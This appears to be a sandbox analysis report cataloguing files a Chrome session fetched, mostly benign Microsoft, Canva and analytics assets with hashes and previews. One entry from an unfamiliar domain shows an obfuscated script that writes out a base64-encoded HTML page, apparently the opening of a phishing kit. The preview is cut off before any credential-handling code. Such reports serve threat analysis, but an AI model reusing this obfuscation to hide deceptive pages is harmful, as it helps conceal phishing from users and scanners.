                                                                                                                                                              SHA-256:EC78C90E8E2ADA3A7646D0928BFC4AC8340A6450A08F32FB8F71EE44259FBD54
                                                                                                                                                              SHA-512:5CDF4E2C5930C196CDB7272A47F99DF6F28BECB6E999219E081F471356B35AE97FAFA118724E30774EFA44612591115A505AD19BBCC959B2FA4A1D143D2B2854
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_FreeAccount_6.4?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=96&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D................?.................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe...........&....pixi............av1C........colrnclx...........ispe...........&....pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma.........................Umdat.....*..%.P2...@..@...u..H..=..X..n..+.Bb.6j.C..v.VQ.4..N|..1.......)...%o..ASqU...~...a7.jc....].u.K.DG%..H...d.."..f.?....i.h...vc..K..W .e}G......5.....K~...w.8h$.Y....L.h3V.....I........{8.d. ..h.9$.5d3&sq. .C.....K....n...{N9...!v.i.S...p.....,.'............*..%..B2....@.......$v.<.H.J(...-.l..#L.........<.G...N]..b...0...\...c@...F.@..ht..R..Uf:...8......\7.DZ..R.[.)...j]...y.V....2X.$.?|.RAp....v..4.LqE.&(a.z;...!y..*&.....}.Z...U..^;.........k?...}u?{.>.....K.B..x.Z.....oS./ar3..[g l.{X...?._N.;.g..W/
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (46591)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):142367
                                                                                                                                                              Entropy (8bit):5.430597817875451
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:CCAA31FD031C4C856EB7B986FD9F447B
                                                                                                                                                              SHA1:0A809EABCDB95FA04DE5F8409B3BC994ED65CBD1
                                                                                                                                                              SHA-256:3D40B4129B8B4C284908636AE46D72EA053F286FB5FE45DB78351B5B2CFC1EB9
                                                                                                                                                              SHA-512:4B5B2271DB5F640FEBF13A7C0BDBD630C73530000F1593046D090585D1752E239D894614E23E801BE4C6A379406B6EF521423FA27C3865C3CD4ABB0A64823780
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://aadcdn.msftauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                                                                              Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (27332), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):27332
                                                                                                                                                              Entropy (8bit):5.48233759733871
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:4502CFFD9A049B7D23CF17CC2DE9B80D
                                                                                                                                                              SHA1:2150B19E2378B68F766A958A1408E599C556BE44
                                                                                                                                                              SHA-256:2823FBFA7B9256867E21AF1ECBFBB98583C8EF0E0B495F6F01D862EF58E3D93D
                                                                                                                                                              SHA-512:28CE499A0787323277957763ADE1B7F5341E547CF82ECE2E4B7CD4F35B250B48F87596CF2E580D7400FE5FB35D73493D932781E851E254753A61EF123EB2EA32
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:window.lpTag=window.lpTag||{};lpTag.taglets=lpTag.taglets||{};lpTag._tagv="4.1.13";!function(a,b){function c(c,d,e){b._logcnt=b._logcnt||0;H(c,d,e,b._logcnt);if("undefined"!=typeof a.lpTaglogListeners&&a.lpTaglogListeners.constructor===Array)for(var f=0;f<lpTaglogListeners.length;f++)try{lpTaglogListeners[f](c,d,e,b._logcnt)}catch(g){H("Exception="+g.message+" msg="+c,d,e,b._logcnt)}b._logcnt++}function d(a){if(a)for(var b=0;b<a.length;b++)qa[a[b].service]=a[b].baseURI}function e(){for(var a=Ga.PRODUCTION,c=b.ovr&&b.ovr.domain,d=0;d<Ha.length;d++)if(Ha[d].tagDomain===c){a=Ha[d].env;break}return a}function f(a){var c;a=a||e();if("string"==typeof a)for(var d=0;d<Ha.length;d++)if(Ha[d].env===a&&(b.tagletsPrecomputed&&Ha[d].tagletsPrecomputed||!b.tagletsPrecomputed&&!Ha[d].tagletsPrecomputed)){c=Ha[d].tagDomain;break}return c}function g(a){var b=qa[a],c="ALL";return b?b:qa[c]}function h(){return qa}function i(a){return l(ra,a)}function j(a){return l(sa,a)}function k(a,b){for(var c in b)b.h
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (2508), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2508
                                                                                                                                                              Entropy (8bit):5.581228471127567
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F88665C80987A03F9FFA51D835E021DD
                                                                                                                                                              SHA1:B98092D614186160765398901DE37E506A71E2E5
                                                                                                                                                              SHA-256:510D8CB5CF5C36767295FDD87C54118DBAE8E6B406BEBBA7789B68B00D25BF87
                                                                                                                                                              SHA-512:E57E96BA265813730C6A9721C6B135A64AC3CB049E9D86EC9D90DBD15B5954B665B2F2690C2186746DF611EB43DA2D2B10AA23D258CE499AE74955B369344CFC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:lp4273297438({"onsiteLocations":[4273302638],"followMeTime":0,"connectorId":1644210230,"renderingType":1,"channel":1,"allowUnauthMsg":true,"windowConf":{"json":{"externalConfiguration":null},"type":"internal"},"description":"","language":"en-US","source":0,"type":5,"enabled":true,"skillName":"BOT-POWER-GREETER-EN-US","isUnifiedWindow":true,"id":4273297438,"isPopOut":false,"timeInQueue":0,"visitorBehaviors":[138786914],"followMePages":1,"availabilityPolicyForMessaging":1,"campaignId":"4273296838","zones":[1832737930],"windowId":1832741830,"conversationType":1,"skillId":4273314838,"useSystemRouting":false,"effects":{"useLightBox":false,"secondsToCollapseAfter":0},"createdDate":"2023-10-31 15:31:55","connector":{"deleted":false,"configuration":{"acrValues":["0"],"pkceEnabled":false,"clientId":"60270350","jsMethodName":"lpTag.taglets.unAuthMessaging.lpUnauthFunction","jsContext":"lpTag.taglets.unAuthMessaging","jwtPublicKey":"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvGQctwBFFZBaSu+LC4LV
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):171505
                                                                                                                                                              Entropy (8bit):5.043804815226508
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:8F186BBA557DC6140841C682AF4D60EE
                                                                                                                                                              SHA1:CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
                                                                                                                                                              SHA-256:CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
                                                                                                                                                              SHA-512:17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                                                                                                              Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (7501), with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):19703
                                                                                                                                                              Entropy (8bit):5.86328678383889
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:6AB6BB502547A187A2F4CFC0A4BEF0F7
                                                                                                                                                              SHA1:EA9C432BCD86D7A4837CECA6D457DB21D898E40E
                                                                                                                                                              SHA-256:75446AF6CBF4226481B134C68E26CB49C4F23564DD7E912B5D049E90CB91F308
                                                                                                                                                              SHA-512:645D3A6B28E96C911B6AFF920EE689C084CD896FA67CFBF9EE4B887D69F96A29E9920C53E28554304ACE6B4930E48EBED206F82C58899E50791D1A9F354CD126
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://gu3.watetiona.com/YEcft/
                                                                                                                                                              Preview:<script>....if(atob("aHR0cHM6Ly9HVTMud2F0ZXRpb25hLmNvbS9ZRWNmdC8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNpRkVNdlFUUVliIGg0e21hcmdpb
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (12221)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):12285
                                                                                                                                                              Entropy (8bit):5.479873124322234
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:3B61A5635218DAEA6ACA97B0F27C34F0
                                                                                                                                                              SHA1:2A641185B7FF1A9E026EE36EB13A6CCE99F58CFF
                                                                                                                                                              SHA-256:4B38500D8C432F65EC2BDB0685229C2E92176B338E78F1E393919791ADC295E6
                                                                                                                                                              SHA-512:8DC4C0B67295E4E39C989ABF36C71EAFFCBEBB24DDB1EC2DE6E80E5C627DB5F2CBF78E87EAC6A59BEDCD0CA4BB95AF0450FB4A55929993AA5F2355FD4A09800C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://static.canva.com/web/e15e945e8b4aba4c.runtime.js
                                                                                                                                                              Preview:(()=>{"use strict";var e,t,r,n,o,s={},i={};function a(e){var t=i[e];if(void 0!==t)return t.exports;var r=i[e]={id:e,loaded:!1,exports:{}};return s[e].call(r.exports,r,r.exports,a),r.loaded=!0,r.exports}a.m=s,e=[],a.O=(t,r,n,o)=>{if(!r){var s=1/0;for(f=0;f<e.length;f++){for(var[r,n,o]=e[f],i=!0,c=0;c<r.length;c++)if((!1&o||s>=o)&&Object.keys(a.O).every((e=>a.O[e](r[c]))))r.splice(c--,1);else if(i=!1,o<s)s=o;if(i){e.splice(f--,1);var l=n();if(void 0!==l)t=l}}return t}else{o=o||0;for(var f=e.length;f>0&&e[f-1][2]>o;f--)e[f]=e[f-1];e[f]=[r,n,o]}},a.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return a.d(t,{a:t}),t},r=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,a.t=function(e,n){if(1&n)e=this(e);if(8&n)return e;if("object"==typeof e&&e){if(4&n&&e.__esModule)return e;if(16&n&&"function"==typeof e.then)return e}var o=Object.create(null);a.r(o);var s={};t=t||[null,r({}),r([]),r(r)];for(var i=2&n&&e;"object"==typeof i&&!~t.indexOf(i);i=r(i))Object.getOwnPropertyNames(i).
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):11232
                                                                                                                                                              Entropy (8bit):4.6331503450371505
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:7FA2105E727E504AAF2557640251B9A6
                                                                                                                                                              SHA1:341F9959BEC50971198680145E37E77177F83C6D
                                                                                                                                                              SHA-256:C7AAA9B5376FDE8B3DE7A92A84E336A161D4232D6238874173B305CA32567D41
                                                                                                                                                              SHA-512:378A637DF8E0905FBE992B8CC9F646A95640EDB4AE8A0ADCFA0DE5BF004B239FC3D5F742991BE0322C79EE72A7FA1F8E6CC68EEBC18BF205D1718FA845C7F7F7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine-page/clientlib-chatgpt-drawer.min.ACSHASH7fa2105e727e504aaf2557640251b9a6.js
                                                                                                                                                              Preview:(() => {. const ATTRIBUTE_SELECTORS = {. DATA_MOUNT_CHAT_AI_DRAWER: '[data-mount="ai-chat-drawer"]',. };.. const ATTRIBUTES = {. IS_AUTHOR: 'data-is-author',. IS_ENV_PROD: 'data-is-env-prod',. PARAMS: 'data-params',. };.. const EventName = {. KEY_DOWN: 'keydown',. WEBCHAT_CONNECT_FULFILLED: 'webchatconnectfulfilled'. };.. const Selector = {. WEB_CHAT_FEED: '[role="feed"]',. FOOTNOTE_LINK: '.ac-horizontal-separator + .ac-container a, .webchat__link-definitions__list-item-box--as-link',. ACTION_SET_BUTTON: '.ac-pushButton:not(.action--ai-feedback)',. POSITIVE_FEEDBACK_BUTTON: '[id$="-positive"] .ac-pushButton',. NEGATIVE_FEEDBACK_BUTTON: '[id$="-negative"] .ac-pushButton',. RELATED_LINKS: '[id$="-related"] .ac-anchor'. };.. // Constant values for the AI Chat Drawer component.. const IS_AUTHOR = document.querySelector(ATTRIBUTE_SELECTORS.DATA_MOUNT_CHAT_AI_DRAWER).getAttribute
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1920x1080, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):103626
                                                                                                                                                              Entropy (8bit):7.996755520044852
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:2595D188B7B61C21FCF01D384962387F
                                                                                                                                                              SHA1:252195BA04EC1623EB1A22BCCC6968192E1543FF
                                                                                                                                                              SHA-256:C2AE1E1733C1DDCBE8BA37AB1CF1A3101F78156D22B88C9657EA0227FC97204B
                                                                                                                                                              SHA-512:D7B3FB1B5959A299F7A0DA4B69701F26A34FEC126E023FFB160CA1E78ABA9B3B81D4053A310E5CFD173FCB9A91EA95E08A3A7D90D277AE2540B4840FC66EEC01
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF...WEBPVP8 ....pv...*..8.>...A......Q,..a...2.c...Y...)#ud..}.DI.|.W......~....A........?.........W...../.o...._.....~`..........h........._.?....z...../...._..?..................x....................#?........[............Q.....w...'.?.......=....h.Q.......w.....?..........c...........~.....................^..+............|../....S.......O......o.................).;..........|................_............?.............._.....d...{......./.................._N>=.S.G................._..+~......o..........$.....w......}.......*.....1.w...w....._....q...[...o..........[.......>4~Y.....o............_.O......r......._........E_....8...... (t..e).....U..]V..uZ.|+.........YA1..e.../.......uZ..k..U..xD..:.H..Qj.r. .z.D3jX..s.[&..;.....f.t...u...n..QL,..L.u`x..-.B..<....5g9.=W...W..T.].h.\z.....r..W.H....X......:[.s..mdB%Jp..a8.wt....~....8A..wZ..k..y..y..~X65.2..e.>]...I.....*j._s.F................q...[....x...wZ..k.....A..Z7..Z.$../.h.O....LZ..UH
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (12824)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):58060
                                                                                                                                                              Entropy (8bit):5.596324920359172
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:1986FCF12655BE6003E39A655BEB6F0F
                                                                                                                                                              SHA1:0C90899E47927E6D63E445B6BFE9C986E8621830
                                                                                                                                                              SHA-256:F66185BEC9D95EC9E4C49D1B38F433AB51AEF9853B21B5D3C0DA54F3987EAF0C
                                                                                                                                                              SHA-512:FAD912AC31C6297A4D4EAA4FC263C5EF8ECA0281D79213B64CE606BBC124B0BFD7F1CADF47C34560406AC804EEF87922E25F7D054B3C539F3AE95D30C8EE7FAB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/msonecloudapi/assets/msochead.js
                                                                                                                                                              Preview:/*! Static Override Utilities */.(()=>{window.SOUtil=window.SOUtil||{addStylesheet:(cssStyles,overrideId)=>{const style=document.createElement("style");if(overrideId){style.id="static-override-"+overrideId}style.appendChild(document.createTextNode(cssStyles));document.head.appendChild(style)},pageIsInScope:pageScope=>{const host=location.hostname;const path=location.pathname;const locale=document.documentElement.lang.toLowerCase();const getMarket=marketAware=>{const locale=document.documentElement.lang.toLowerCase();const langCode=locale.split("-")[0];const market=new URLSearchParams(location.search).get("market")?.toLowerCase();if(market&&marketAware!==false){return`${langCode}-${market}`}return locale};const langLocs={"sr-rs":["sr-rs","sr-latn-rs","sr-cyrl-rs"],default:[locale]};const possibleLangLocs=langLocs[locale]||langLocs.default;const pathLocale=possibleLangLocs.find(loc=>path.indexOf(loc)!==-1);const pathNoLocale=path.replace(`/${pathLocale}`,"").replace(/\/$/,"");const previ
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5876
                                                                                                                                                              Entropy (8bit):7.9518024430055645
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:D1E5A6C83BC32A0478AA284AFC22434E
                                                                                                                                                              SHA1:7CF6ADF17A50F19ADC1B07CEFFDA5BC52DEC199C
                                                                                                                                                              SHA-256:625174342D187C1A8B6625223961C44C5904237BD0BD0503A73C6EDA79E1E742
                                                                                                                                                              SHA-512:AE25D006E1FD6F9DCEE9248D25C13E7ACB3F061A398E060CE40FB6A0A18E72EE62078F7A7D79CE4C5E1B3C5C841B313DA8D6D12DCEC904653E43E8138593CCBF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF....WEBPVP8X........t..'..ALPH.......i.Z..O.......z%@.$IR.Y...%f.....~mFL..m.l...WP..#.?.....M......_......_...e.._...e.._...e.._...e.._..?..OuwuS.......L...P.)..*.c.Z."(.?..1..[.H]...)mf.F.!l......VHi...LP ........0.....0.MV...os......VP8 ....pa...*u.(.>..'....v..v....W...s..o...O.......0q...]=\.....o........'.=.....g...G.g..?...<....G...../.........{....i./.[.o.W./.o....................Y......./............/.......o_|2v.....>...9......P~m.?...../.. .w.`.f...... ?....../........(x..K...O................O......b.....'.7.?...."...K................%...O.?............_.g..._.?..z..........o...b.`8....z.Q.=G.....z.Q.=G.....z.Q.b.S.qN.X...}.qN).:......z.Q.=.....3.x...^....u....Q.=H.....wVU....^.OSYWv.Ak..;2.5R..\.....#`A...ns..i...........%..1.....e.>q.X...Q@.....tzI......^.K..... 2....9.e..B{/'....rqATv.J5.............e^..<...).T.u:e......(T.'.R(..j..bW.E.../K$..........wK.>.n4.=v5.h.....).8...../{.Q.=G....X/.x...<hmz.....S.q.b.;#la.....k...a.5.V!...Q.=
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (576)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):59868
                                                                                                                                                              Entropy (8bit):5.549823852454853
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:30368A72D017E4133BFD3B5D073D06FF
                                                                                                                                                              SHA1:7BD9259C475D46707628108E5A1C33DDAEE43BF3
                                                                                                                                                              SHA-256:ED425C2855B7269156A549BFA9C2594882C8813B1FB3CB52D067D5A9B5471E96
                                                                                                                                                              SHA-512:0A3E298D69906024DC0FB5854F3E57816A81506E513A1823127F4AC7A943A0D942AD8F3D41EB5EC0DB4D2AD8ABE1F39A0B6CDB024C4F547733B9922F676A9BB3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/visitor.min.ACSHASH30368a72d017e4133bfd3b5d073d06ff.js
                                                                                                                                                              Preview:/*.. Adobe Visitor API for JavaScript version: 4.4.0. Copyright 2019 Adobe, Inc. All Rights Reserved. More info available at https://marketing.adobe.com/resources/help/en_US/mcvid/.*/.'use strict';var e=function(){function N(d){return(N="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(f){return typeof f}:function(f){return f&&"function"==typeof Symbol&&f.constructor===Symbol&&f!==Symbol.prototype?"symbol":typeof f})(d)}function O(d,f,g){return f in d?Object.defineProperty(d,f,{value:g,enumerable:!0,configurable:!0,writable:!0}):d[f]=g,d}function P(d,f,g){d=null==d?void 0:d[f];return void 0===d?g:d}function R(d,f){if(d===f)return 0;d=d.toString().split(".");.f=f.toString().split(".");a:{var g=d.concat(f);for(var c=/^\d+$/,k=0,m=g.length;k<m;k++)if(!c.test(g[k])){g=!1;break a}g=!0}if(g){for(;d.length<f.length;)d.push("0");for(;f.length<d.length;)f.push("0");a:{for(g=0;g<d.length;g++){c=parseInt(d[g],10);k=parseInt(f[g],10);if(c>k){d=1;break a}if(k>c){d=-1;break a}}d=0
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (32752)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):244867
                                                                                                                                                              Entropy (8bit):5.512305020603325
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:902C1C600614DB8B70B9DDE49AF11CA6
                                                                                                                                                              SHA1:42FE79AAD7EA69FF5BD5409923A3FBADDD0D415C
                                                                                                                                                              SHA-256:C6C0B1ADA1EDAC2EACC71CEDFF425B806CDDA82F8C89F02F6E71F7F0BAA96FD5
                                                                                                                                                              SHA-512:D3E87E205512E9AF47DD7E3FEE53FCBB03A84857A5ECD5784ABD9CD55C03A186860CBCA0B3E9FC540A4C3AB932DC1BBEA6517503417E38D3CDDF5A0812C0F200
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:// For license information, see `https://assets.adobedtm.com/launch-ENc0cbffaf0f8248c3a934a56818d7737e.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-12-12T17:43:22Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"ENc0cbffaf0f8248c3a934a56818d7737e",stage:"production"},dataElements:{MC1_DE:{defaultValue:"",modulePath:"core/src/lib/dataElements/cookie.js",settings:{name:"MC1"}},purl:{defaultValue:"",cleanText:!0,storageDuration:"pageview",modulePath:"core/src/lib/dataElements/pageInfo.js",settings:{attribute:"url"}},cachebuster:{defaultValue:"",cleanText:!0,storageDuration:"pageview",modulePath:"core/src/lib/dataElements/randomNumber.js",settings:{max:1e6,min:1}}},extensions:{clicktale:{displayName:"Clicktale Tag Injector",hostedLibFilesBaseUrl:"https://assets.adobedtm.com/extensions/EP4d83bfe125da46f2b5b2fcacec043b9f/",settings:{guid:"76a3450f-9b77-4456-a451-720ddc99b4c8",partition:"www
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):513
                                                                                                                                                              Entropy (8bit):5.376715282584502
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:8FF776E9B5E4A2DD2B086F24EE818F18
                                                                                                                                                              SHA1:BAA26B218C718882BAB24A1F30C2267F4F76538E
                                                                                                                                                              SHA-256:4486E4FA868ED7D1CE77D4A1B47314139D49B40A42891DCC669E113B717DF2ED
                                                                                                                                                              SHA-512:179A605F5C7F2BEADA26E100AA01CDE112A88BD1653676FC09161D092F90A5B58B4BFB9105C7493BC2234B0326AD7460518464FE4F0A310D512151E8F57EA4C8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://static.canva.com/web/9f2c0bc31661107f.js
                                                                                                                                                              Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[8703],{../***/ 577033:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {__c.nq=__c.G(()=>({}));__c.oq=__c.G(()=>({}));.}).call(self, self._fe4d99ebe0d2d259646a80d250150d47);}..}]).//# sourceMappingURL=sourcemaps/9f2c0bc31661107f.js.map
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):89501
                                                                                                                                                              Entropy (8bit):5.289893677458563
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
